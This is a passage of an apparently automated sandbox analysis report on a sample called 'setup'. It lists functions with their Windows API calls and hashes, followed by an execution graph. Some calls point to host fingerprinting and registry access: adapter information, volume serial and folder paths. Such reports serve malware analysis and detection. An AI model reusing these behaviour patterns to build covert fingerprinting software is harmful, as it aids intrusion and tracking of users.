                                                                                                                                                                                                                                                                          • API String ID: 1988240374-0
                                                                                                                                                                                                                                                                          • Opcode ID: 88f1725d30e76e651ae4c3c405e87a3d6c66aae2df1dc1fb0384dae8fcf9c673
                                                                                                                                                                                                                                                                          • Instruction ID: 69607ac0a36914a34f954432bf053593c0d244222ee4bf07b9bf8a602e25d8da
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88f1725d30e76e651ae4c3c405e87a3d6c66aae2df1dc1fb0384dae8fcf9c673
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A31AC75505211CFE301CF24C881B9A73E0EB447A1F55465EF8A6AF6A2DB32F885CF82
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,1002FD3C,0000000A), ref: 10011AA5
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,1002FD7C,0000000C,?,00000000,?,1002FD3C,0000000A), ref: 10011AFB
                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 10011BAE
                                                                                                                                                                                                                                                                            • Part of subcall function 10005580: _memcpy_s.LIBCMT ref: 10005621
                                                                                                                                                                                                                                                                          • SendMessageW.USER32(0000000C,00000111,00000000), ref: 10011C41
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$Show$EnableMessageSend_memcpy_s
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2142818531-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5e10158f3abe846885322613e3c36518130cd84edeb6ee11b16ce95f2ad9bfe5
                                                                                                                                                                                                                                                                          • Instruction ID: c77ea82d2ec4123865e5b06f03d322ab44f2e88015c32df094105da2ed7694c3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e10158f3abe846885322613e3c36518130cd84edeb6ee11b16ce95f2ad9bfe5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C7169B4509780AFD314DF64C885A5BFBE9EB99740F800A2EF2A1472A1DBB4D844CF53
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10025A13
                                                                                                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 10025A47
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,1001BEA8,?,?,00000002), ref: 10025A78
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,1001BEA8,?,?,00000002), ref: 10025AE6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                                                                                                          • Opcode ID: 779e7d33b9541bfb64b5fc2f64f9bf6b5efe3c2a1d130c56c8b075eb8ff8699e
                                                                                                                                                                                                                                                                          • Instruction ID: fc065e40f2b10d99558e67bc2981429e5b45d363ccbf6bb4f39c87f48c76dea3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 779e7d33b9541bfb64b5fc2f64f9bf6b5efe3c2a1d130c56c8b075eb8ff8699e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9311431510286EFDB10CFA0D8C2AAE3BF5FF00252F9186A9E4528B0D1E332DD40CB56
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1000C78D
                                                                                                                                                                                                                                                                            • Part of subcall function 100172FB: RaiseException.KERNEL32(?,?,100163B9,0000001B,?,?,?,?,100163B9,0000001B,10031154,10035B80), ref: 1001733B
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1000C7D1
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1000C815
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1000C854
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3476068407-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4bdd9ec3c7e2989ced90ec6dd1cbeed609424f583945d4b21bf4d64f85c05a21
                                                                                                                                                                                                                                                                          • Instruction ID: 970580fd9f4fb8637838362f685a7036e4f7ce5e8f09dc723077c7b205c464d5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bdd9ec3c7e2989ced90ec6dd1cbeed609424f583945d4b21bf4d64f85c05a21
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5314AB5018788AED311CF64DC41FDBB7E8FF89380F808A1CF69986192EB74A545CB56
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 1001AE7A: _doexit.LIBCMT ref: 1001AE82
                                                                                                                                                                                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 10015FDA
                                                                                                                                                                                                                                                                            • Part of subcall function 1001A63F: TlsGetValue.KERNEL32(1001A782,?,?,10001AD3,?), ref: 1001A645
                                                                                                                                                                                                                                                                            • Part of subcall function 1001A63F: __decode_pointer.LIBCMT ref: 1001A655
                                                                                                                                                                                                                                                                            • Part of subcall function 1001A63F: TlsSetValue.KERNEL32(00000000,?,10001AD3,?), ref: 1001A662
                                                                                                                                                                                                                                                                            • Part of subcall function 1001A624: TlsGetValue.KERNEL32(?,10015FEA,00000000,?), ref: 1001A62E
                                                                                                                                                                                                                                                                          • __freefls@4.LIBCMT ref: 10016025
                                                                                                                                                                                                                                                                            • Part of subcall function 1001A669: __decode_pointer.LIBCMT ref: 1001A677
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000,?), ref: 10016001
                                                                                                                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 10016008
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value$__decode_pointer$ErrorExitLastThreadUser___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 470431776-0
                                                                                                                                                                                                                                                                          • Opcode ID: c6ddff217bd9dcd0928945d4b8938243752554259bf409bc15fae426fdb482d5
                                                                                                                                                                                                                                                                          • Instruction ID: 03ead3322f4582f10db39b825c74f10941e86ac671a8896d89692834ae123982
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6ddff217bd9dcd0928945d4b8938243752554259bf409bc15fae426fdb482d5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF11A7B9500201AFD704EFA5CD8594F7BE9EF49204F218466F9088F162DB35ECC3DA51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 10008733
                                                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 10008751
                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 10008770
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 1000878E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DialogIconLoadMessageSendShowWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 308795921-0
                                                                                                                                                                                                                                                                          • Opcode ID: 571ff1f7cdf3a00e104c138906a61bc1d74ba05420b078774c0866de41e6df19
                                                                                                                                                                                                                                                                          • Instruction ID: c8b3ac1def077a1afa6e90268c8b7f9677d5907aa4c780b59e039311b864e218
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 571ff1f7cdf3a00e104c138906a61bc1d74ba05420b078774c0866de41e6df19
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65117C79604620AFF201AB24CC8AF6B37A9FB89B45F20850AF5419B2D5C7B4D942CB60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                                                                                                                                                          • Instruction ID: 9e8e0e8e05aac1d0c2d65642af544b24153418be173f2fc037f02c316d8a234c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9013D3640014ABBCF129E84EC41DEE3F72FB19291B968415FE2959031DB76DAB1AB81
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 1001A7F6: __getptd_noexit.LIBCMT ref: 1001A7F7
                                                                                                                                                                                                                                                                            • Part of subcall function 1001A7F6: __amsg_exit.LIBCMT ref: 1001A804
                                                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 1001E123
                                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 1001E133
                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 1001E150
                                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(10034C20), ref: 1001E17B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2880340415-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0118f62f079362de73d0149a5e646a3da2d058c27332fb0093e2dab184669954
                                                                                                                                                                                                                                                                          • Instruction ID: b527ee2c6d3c56f5681c6076ea085fafa2e11bdb4375274561a2def266ad6ba8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0118f62f079362de73d0149a5e646a3da2d058c27332fb0093e2dab184669954
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88016D39A01661AFDB42EB69888578E77E1FF08751F160406E9106F291CB74FDC1CBD2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 10011458
                                                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000), ref: 10011471
                                                                                                                                                                                                                                                                          • RedrawWindow.USER32(00000000), ref: 10011487
                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000000C,00000000,?), ref: 100114A2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$MessagePointsRectRedrawSend
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2944517699-0
                                                                                                                                                                                                                                                                          • Opcode ID: b995667e912f45d88a79baf81a9a416fda78dba68161af8df406c78a587512e6
                                                                                                                                                                                                                                                                          • Instruction ID: ca64d96baf6b07923244387a90139b865a12e5bf54fb4fb4b58016c279e446e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b995667e912f45d88a79baf81a9a416fda78dba68161af8df406c78a587512e6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A01DF71504310BFF200EB10CC8AFAF7BA8EFC5B01F804909F6459A0A0C774DA95CBA2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(1002DCB0,10030BA8,0000000C,1001A7D1,00000000,00000000,?,?,10001AD3,?), ref: 1001A6D0
                                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(100347F8), ref: 1001A72B
                                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 1001A733
                                                                                                                                                                                                                                                                          • ___addlocaleref.LIBCMT ref: 1001A752
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2801583907-0
                                                                                                                                                                                                                                                                          • Opcode ID: 709ff1dd404db19b1d8b125c2737d9825d1602d331c18baf4c7e3f2735b8daed
                                                                                                                                                                                                                                                                          • Instruction ID: 369a2286e42145447c857bb8e2798ec54df95f5f4b133e3671179662ed33da0c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 709ff1dd404db19b1d8b125c2737d9825d1602d331c18baf4c7e3f2735b8daed
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1115774804B01AEE761EF39DC85B9ABBF0EF04314F61441AE5A99A690CB74EA80CB10
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 1001A7F6: __getptd_noexit.LIBCMT ref: 1001A7F7
                                                                                                                                                                                                                                                                            • Part of subcall function 1001A7F6: __amsg_exit.LIBCMT ref: 1001A804
                                                                                                                                                                                                                                                                          • __getptd_noexit.LIBCMT ref: 10015F6F
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 10015F83
                                                                                                                                                                                                                                                                          • __freeptd.LIBCMT ref: 10015F8A
                                                                                                                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 10015F92
                                                                                                                                                                                                                                                                            • Part of subcall function 1001AB92: __FindPESection.LIBCMT ref: 1001ABB9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __getptd_noexit$CloseExitFindHandleSectionThreadUser__amsg_exit__freeptd
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2409394463-0
                                                                                                                                                                                                                                                                          • Opcode ID: f67cbe03422ec98c3236cf964ce2d68052dbdb584e9dcce6ebf761c9831b1b78
                                                                                                                                                                                                                                                                          • Instruction ID: 333ebb5b86168e80eab8e9e7dde933c8e3d5246a917decfb7d29f8ee1a5ad046
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f67cbe03422ec98c3236cf964ce2d68052dbdb584e9dcce6ebf761c9831b1b78
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F05E36805910EEE311EBA08C4DB6E37A5EF05362F65021AF6119E0E2DB70DDC28651
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:5.4%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                          Signature Coverage:2.5%
                                                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:61
                                                                                                                                                                                                                                                                          execution_graph 91195 6a54d190 91206 6a54e3c0 91195->91206 91207 6a549390 2 API calls 91206->91207 91208 6a54e416 91207->91208 91209 6a546a10 43 API calls 91208->91209 91210 6a54e469 91209->91210 91211 6a549390 2 API calls 91210->91211 91212 6a54e48b 91211->91212 91213 6a546a10 43 API calls 91212->91213 91214 6a54e4d9 91213->91214 91215 6a549390 2 API calls 91214->91215 91216 6a54e4fb 91215->91216 91281 6a5762e4 91216->91281 91218 6a54e508 91291 6a550e60 91218->91291 91282 6a5762f2 91281->91282 91286 6a576315 91281->91286 91283 6a5762f8 91282->91283 91282->91286 91337 6a575f01 14 API calls __dosmaperr 91283->91337 91339 6a57632d 42 API calls 3 library calls 91286->91339 91287 6a576328 91287->91218 91288 6a5762fd 91338 6a571f2f 41 API calls ___std_exception_copy 91288->91338 91290 6a576308 91290->91218 91292 6a56cbfb std::_Facet_Register 16 API calls 91291->91292 91293 6a550e9f 91292->91293 91340 6a551cc0 91293->91340 91337->91288 91338->91290 91339->91287 91367 6a545ef0 91340->91367 91342 6a551d0e 91343 6a545ef0 43 API calls 91342->91343 91344 6a551d1e 91343->91344 91381 6a545370 91344->91381 91368 6a545f17 91367->91368 91369 6a545f1e 91368->91369 91370 6a545faf 91368->91370 91372 6a545f79 91368->91372 91373 6a545f5a 91368->91373 91369->91342 91439 6a546fd0 RaiseException Concurrency::cancel_current_task std::_Facet_Register 91370->91439 91378 6a56cbfb std::_Facet_Register 16 API calls 91372->91378 91380 6a545f6e codecvt 91372->91380 91373->91370 91375 6a545f61 91373->91375 91374 6a545f67 91374->91380 91440 6a571f3f 41 API calls 2 library calls 91374->91440 91377 6a56cbfb std::_Facet_Register 16 API calls 91375->91377 91377->91374 91378->91380 91380->91342 91441 6a545720 91381->91441 91383 6a5453b5 91455 6a5458f0 SHGetFolderPathW GetVolumeInformationW 91383->91455 91387 6a5453eb codecvt 91388 6a547090 41 API calls 91387->91388 91481 6a545650 91441->91481 91444 6a5457f0 91446 6a545810 91444->91446 91449 6a545875 91444->91449 91445 6a54577b 91447 6a546a10 43 API calls 91445->91447 91448 6a546a10 43 API calls 91446->91448 91450 6a5457b0 91447->91450 91448->91450 91488 6a5454b0 47 API calls codecvt 91449->91488 91452 6a5457e9 codecvt 91450->91452 91489 6a571f3f 41 API calls 2 library calls 91450->91489 91452->91383 91456 6a54599d 91455->91456 91457 6a545978 91455->91457 91492 6a5460b0 91456->91492 91458 6a546a10 43 API calls 91457->91458 91460 6a54599b 91458->91460 91462 6a56cbbc codecvt 5 API calls 91460->91462 91464 6a5453cb 91462->91464 91464->91387 91480 6a546470 43 API calls 2 library calls 91464->91480 91480->91387 91482 6a545678 91481->91482 91486 6a545670 codecvt 91481->91486 91482->91486 91490 6a546790 43 API calls 2 library calls 91482->91490 91483 6a5456b4 GetAdaptersInfo 91484 6a545707 91483->91484 91483->91486 91484->91444 91484->91445 91486->91483 91491 6a546790 43 API calls 2 library calls 91486->91491 91488->91450 91490->91486 91491->91486 91493 6a5460e8 _swprintf 91492->91493 91496 6a575e23 91493->91496 91497 6a575e37 _Fputc 91496->91497 91502 6a5724a9 91497->91502 91503 6a5724b5 91502->91503 91504 6a5724d8 91502->91504 93072 348ef1 GetProcessHeap HeapAlloc 93073 348f0d 93072->93073 93074 348f09 93072->93074 93082 348c83 93073->93082 93076 348f18 93077 348f34 93076->93077 93079 348f28 93076->93079 93096 348d8f 15 API calls std::locale::_Setgloballocale 93077->93096 93080 348f41 GetProcessHeap HeapFree 93079->93080 93081 348f52 93079->93081 93080->93074 93083 348c90 DecodePointer 93082->93083 93084 348c9d LoadLibraryExA 93082->93084 93083->93076 93085 348cb6 93084->93085 93086 348d2e 93084->93086 93097 348d33 GetProcAddress EncodePointer 93085->93097 93086->93076 93088 348cc6 93088->93086 93098 348d33 GetProcAddress EncodePointer 93088->93098 93090 348cdd 93090->93086 93099 348d33 GetProcAddress EncodePointer 93090->93099 93092 348cf4 93092->93086 93100 348d33 GetProcAddress EncodePointer 93092->93100 93094 348d0b 93094->93086 93095 348d12 DecodePointer 93094->93095 93095->93086 93096->93079 93097->93088 93098->93090 93099->93092 93100->93094 93101 29c8c0 93102 29c8f7 93101->93102 93108 29c937 93101->93108 93109 349842 EnterCriticalSection 93102->93109 93104 29c901 93104->93108 93113 3496fa 43 API calls 93104->93113 93106 29c923 93114 3497f8 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 93106->93114 93110 349856 93109->93110 93111 34985b 93110->93111 93115 3498ca WaitForSingleObjectEx EnterCriticalSection 93110->93115 93111->93104 93113->93106 93114->93108 93115->93110 93116 2ab480 93117 2ab4cb 93116->93117 93118 2ab4b8 93116->93118 93124 29bad0 45 API calls 2 library calls 93117->93124 93129 34933a 93118->93129 93120 2ab4d5 93125 1b78d0 93120->93125 93123 2ab51a 93124->93120 93126 1b791e std::ios_base::_Ios_base_dtor 93125->93126 93128 1b78fd 93125->93128 93126->93118 93128->93118 93128->93125 93128->93126 93136 34e7df 40 API calls 2 library calls 93128->93136 93130 349342 93129->93130 93131 349343 IsProcessorFeaturePresent 93129->93131 93130->93123 93133 3499aa 93131->93133 93137 34996d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93133->93137 93135 349a8d 93135->93123 93137->93135 93138 2a22e0 93139 2a2319 93138->93139 93140 2a2382 RegCreateKeyExW 93138->93140 93141 2a231e GetModuleHandleW 93139->93141 93142 2a2375 93139->93142 93146 2a237b 93140->93146 93143 2a232d 93141->93143 93144 2a2346 GetProcAddress 93141->93144 93142->93140 93142->93146 93145 2a2356 93144->93145 93144->93146 93145->93146 93147 1b9cf0 93148 1b9d34 93147->93148 93149 1b9cfc 93147->93149 93149->93148 93151 1b9ae0 93149->93151 93152 1b9aed 93151->93152 93155 34b0db 93152->93155 93154 1b9afa RtlAllocateHeap 93154->93148 93156 34b122 RaiseException 93155->93156 93157 34b0f5 93155->93157 93156->93154 93157->93156 93158 2b3b40 93186 1b6610 93158->93186 93160 2b3bba 93191 2b4070 93160->93191 93163 2b3c03 93165 1b78d0 40 API calls 93163->93165 93164 1b78d0 40 API calls 93164->93163 93166 2b3c3c 93165->93166 93167 2b3d00 93166->93167 93169 2b3c59 93166->93169 93170 2b3c75 93166->93170 93206 281bb0 93167->93206 93215 1b6c00 41 API calls 93169->93215 93173 1b6610 41 API calls 93170->93173 93171 2b3d2c 93175 34933a _ValidateLocalCookies 5 API calls 93171->93175 93174 2b3c68 93173->93174 93216 1b8d30 41 API calls std::_Throw_Cpp_error 93174->93216 93176 2b3d4c 93175->93176 93178 2b3c9d 93217 1b7070 93178->93217 93180 2b3cbc 93181 1b78d0 40 API calls 93180->93181 93182 2b3cc8 93181->93182 93183 2b3ce4 93182->93183 93184 1b78d0 40 API calls 93182->93184 93183->93167 93185 1b78d0 40 API calls 93183->93185 93184->93183 93185->93167 93187 1b6637 93186->93187 93188 1b663e 93187->93188 93222 1b7750 93187->93222 93188->93160 93190 1b6670 std::locale::_Locimp::_Locimp 93190->93160 93192 2b40cd 93191->93192 93193 2b40e2 93191->93193 93247 1b7160 93192->93247 93195 2b40ea 93193->93195 93196 2b40ff 93193->93196 93200 1b7160 41 API calls 93195->93200 93197 2b411c 93196->93197 93198 2b4107 93196->93198 93202 2b4139 93197->93202 93203 2b4124 93197->93203 93201 1b7160 41 API calls 93198->93201 93199 2b3bf0 93199->93163 93199->93164 93200->93199 93201->93199 93202->93199 93205 1b7160 41 API calls 93202->93205 93204 1b7160 41 API calls 93203->93204 93204->93199 93205->93199 93207 281c48 RegOpenKeyExW 93206->93207 93208 281be9 93206->93208 93214 281c41 93207->93214 93209 281c3b 93208->93209 93210 281bee GetModuleHandleW 93208->93210 93209->93207 93209->93214 93211 281bfd 93210->93211 93212 281c16 GetProcAddress 93210->93212 93211->93171 93213 281c26 93212->93213 93212->93214 93213->93214 93214->93171 93215->93174 93216->93178 93218 1b70b7 93217->93218 93221 1b7083 std::locale::_Locimp::_Locimp 93217->93221 93261 1b6f40 41 API calls 3 library calls 93218->93261 93220 1b70c8 93220->93180 93221->93180 93223 1b779b 93222->93223 93224 1b775b 93222->93224 93244 1b7730 41 API calls 3 library calls 93223->93244 93226 1b7786 93224->93226 93227 1b7764 93224->93227 93229 1b7796 93226->93229 93237 349379 93226->93237 93227->93223 93228 1b776b 93227->93228 93231 349379 std::locale::_Init 2 API calls 93228->93231 93229->93190 93234 1b7771 93231->93234 93236 1b777a 93234->93236 93245 34e7df 40 API calls 2 library calls 93234->93245 93236->93190 93238 34937e std::locale::_Locimp::_Locimp 93237->93238 93239 1b7790 93238->93239 93241 34939a std::locale::_Init 93238->93241 93246 35e630 EnterCriticalSection std::locale::_Init 93238->93246 93239->93190 93242 34b0db Concurrency::cancel_current_task RaiseException 93241->93242 93243 34a008 93242->93243 93244->93234 93246->93238 93251 1b71ad 93247->93251 93252 1b7171 std::locale::_Locimp::_Locimp 93247->93252 93248 1b7261 93260 1b7150 41 API calls 3 library calls 93248->93260 93250 1b7266 93254 1b7160 41 API calls 93250->93254 93251->93248 93253 1b7750 41 API calls 93251->93253 93252->93199 93256 1b71f6 std::locale::_Locimp::_Locimp 93253->93256 93255 1b72d2 93254->93255 93255->93199 93257 1b7245 std::ios_base::_Ios_base_dtor 93256->93257 93259 34e7df 40 API calls 2 library calls 93256->93259 93257->93199 93260->93250 93261->93220 93262 2ce4a0 93325 2ce310 93262->93325 93264 2ce4ec 93410 2ef190 93264->93410 93267 1b7160 41 API calls 93268 2ce569 93267->93268 93269 2ce5e6 93268->93269 93271 349842 3 API calls 93268->93271 93270 1b6610 41 API calls 93269->93270 93281 2ce5f5 93270->93281 93272 2ce58c 93271->93272 93272->93269 93273 1b7160 41 API calls 93272->93273 93436 1b9e20 93325->93436 93328 2ce48f 93329 1b9ae0 2 API calls 93328->93329 93330 2ce499 93329->93330 93332 